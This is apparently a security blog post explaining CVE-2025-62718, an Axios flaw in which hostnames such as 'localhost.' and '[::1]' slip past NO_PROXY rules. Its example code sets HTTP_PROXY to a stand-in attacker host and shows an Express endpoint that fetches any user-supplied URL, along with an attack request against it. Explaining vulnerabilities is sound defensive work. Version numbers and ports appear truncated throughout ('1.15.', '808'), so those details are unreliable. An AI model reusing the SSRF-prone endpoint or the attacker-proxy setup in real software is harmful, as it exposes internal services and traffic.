The world of web development relies on trustworthy libraries. One of the most popular HTTP clients for JavaScript, Axios, faced a serious issue that you should know about, especially if you rely on proxies for security. This post breaks down CVE-2025-62718 and what it means for your apps, with real code, how attackers can abuse it, and how to defend your systems.

What Exactly Went Wrong?

Axios (before version 1.15.) did not normalize hostnames before checking them against NO_PROXY rules. Axios failed to recognize that localhost. (with a trailing dot) or IPv6 addresses written as [::1] refer to local hosts, so it would *send* those requests through your proxy even when your NO_PROXY settings told it not to.

Why’s This a Problem?

A “proxy bypass” like this is a big deal. Developers use the NO_PROXY setting to *avoid* sending sensitive requests for addresses like localhost or 127.0.0.1 through third-party proxies, keeping internal services private. If attackers can trick Axios into sending these requests through a proxy, it opens the door to SSRF (Server-Side Request Forgery). With SSRF, attackers can potentially reach sensitive internal resources.

How the NO_PROXY Misbehavior Happens

The NO_PROXY variable tells Axios and other HTTP clients to bypass the proxy for the listed hosts. Most developers expect that listing hosts like localhost and 127.0.0.1 is enough. But unnormalized spellings of the same hosts, such as localhost. (trailing dot) or [::1] (bracketed IPv6), were not recognized as matching those NO_PROXY entries.

For example

// Proxy settings in Node.js
process.env.HTTP_PROXY = "http://bad-proxy.attacker.net:808";
process.env.NO_PROXY = "localhost,127.0.0.1,::1";

With Axios (pre-1.15.), a request to http://localhost/ matches NO_PROXY, but http://localhost./ does not (because of the trailing dot).

Let’s see what this looks like in code.

const axios = require('axios'); // use 1.14. or below to trigger the vuln

// Suppose you're trying to post data to a local admin panel
axios.post('http://localhost.:808/admin', {cmd: 'status'})
  .then(res => console.log("Success:", res.status))
  .catch(err => console.error("Error:", err));

If NO_PROXY=localhost,127.0.0.1,::1 is set, you would expect this request *not* to go through the proxy. But because of the trailing dot (localhost.), Axios sends it through HTTP_PROXY anyway, potentially exposing your admin interface to whoever controls the proxy.
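To make the normalization problem concrete, here is an added example of a NO_PROXY matcher that canonicalizes the hostname before comparing it with each entry. It is illustrative code written for this post, not Axios's own implementation; the entry syntax it accepts (exact host, leading-dot suffix, "*", optional ":port", IPv6 in brackets) is an assumption modelled on common proxy-environment conventions. With normalization in place, localhost. and [::1] match the same rules as localhost and ::1.

```javascript
// Added example, not Axios code: a NO_PROXY matcher that normalizes hostnames
// before comparison so "localhost." and "[::1]" are treated as "localhost"
// and "::1". Entry syntax (assumed): host, .suffix, *, optional :port,
// IPv6 written as [addr] or [addr]:port.

// Bring a hostname to a canonical form: lowercase, no IPv6 brackets,
// no trailing dot(s).
function normalizeHost(host) {
  let h = String(host).trim().toLowerCase();
  if (h.startsWith('[') && h.endsWith(']')) h = h.slice(1, -1); // "[::1]" -> "::1"
  while (h.endsWith('.')) h = h.slice(0, -1);                    // "localhost." -> "localhost"
  return h;
}

// Parse a comma-separated NO_PROXY string into { host, port } rules.
function parseNoProxy(noProxy) {
  return String(noProxy || '')
    .split(',')
    .map((e) => e.trim())
    .filter(Boolean)
    .map((entry) => {
      let m = entry.match(/^\[(.+)\](?::(\d+))?$/);    // [::1] or [::1]:8080
      if (!m) m = entry.match(/^([^:]+)(?::(\d+))?$/); // host or host:port
      const host = m ? m[1] : entry;                   // bare IPv6 such as ::1
      const port = m && m[2] ? Number(m[2]) : null;
      return { host: normalizeHost(host), port };
    });
}

// Port the request will actually use, filling in the scheme default.
function effectivePort(u) {
  if (u.port) return Number(u.port);
  return u.protocol === 'https:' ? 443 : 80;
}

// True when the URL's normalized host matches a NO_PROXY rule and the
// request should therefore go direct instead of via the proxy.
function shouldBypassProxy(urlString, noProxy) {
  const u = new URL(urlString);
  const host = normalizeHost(u.hostname); // URL.hostname keeps "[::1]" and "localhost."
  const port = effectivePort(u);
  for (const rule of parseNoProxy(noProxy)) {
    if (rule.port !== null && rule.port !== port) continue;
    if (rule.host === '*') return true;
    if (rule.host === host) return true;
    // "example.com" and ".example.com" both cover subdomains of example.com
    const suffix = rule.host.startsWith('.') ? rule.host : '.' + rule.host;
    if (host.endsWith(suffix)) return true;
  }
  return false;
}
```

The key point is that both sides of the comparison are normalized the same way: the URL's host after parsing and the NO_PROXY entry as written. A matcher that compares the raw URL host against raw entries is exactly what the trailing dot and the bracket defeat.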

Exploit Details

1. Attacker-controlled Proxy: A hacker tricks the server into using an attacker’s proxy, maybe by manipulating environment variables or other config.
2. NO_PROXY Set Up Normally: Developers think they’re safe by listing local/internal addresses.
3. Malformed Hostname Request: The attacker makes a request to localhost. (or [::1], etc.)—a variation Axios fails to recognize.
4. SSRF in Action: Internal requests now go through the proxy, and the attacker can sniff traffic, record credentials, or make requests to other sensitive resources as if they were the server.

Imagine you have this server-side code (simplified)

const express = require('express');
const axios = require('axios');
const app = express();

app.get('/fetch-url', async (req, res) => {
  // User-controlled URL passed straight to axios; nothing restricts the target host
  const url = req.query.url;
  try {
    const data = await axios.get(url);
    res.send(data.data);
  } catch (err) {
    res.status(500).send('Error!');
  }
});

If an attacker sends

GET /fetch-url?url=http://localhost.:808/secret

Despite expectations, Axios (until 1.15.) will forward this to the proxy—even if your NO_PROXY settings would otherwise block it. The proxy then gets internal data.

Upgrade Axios to 1.15.+

The Axios team fixed this vulnerability by correcting their hostname normalization and NO_PROXY checking. This is the most reliable fix.

npm install axios@latest

- Always use up-to-date libraries.
- Sanitize inputs and consider restricting what URLs your backend fetches, especially user-controlled ones.

Axios Release Notes (1.15., Fix NO_PROXY):

https://github.com/axios/axios/releases/tag/v1.15.

Official CVE Record:

https://nvd.nist.gov/vuln/detail/CVE-2025-62718

Common SSRF Explanation:

https://portswigger.net/web-security/ssrf

Final Takeaways

CVE-2025-62718 is a classic example of how tiny details like a trailing dot or unusual bracket can lead to big security holes. Proxy bypasses can turn into full-blown SSRF vulnerabilities. If you’re an Axios user—especially in environments where proxy security is a concern—upgrade now.

Security is in the details! Always keep dependencies fresh, pay attention to changelogs, and watch for tricky differences in input that could fool your safeguards. Stay safe out there.


Timeline

Published on: 04/09/2026 14:31:46 UTC
Last modified on: 04/09/2026 17:16:24 UTC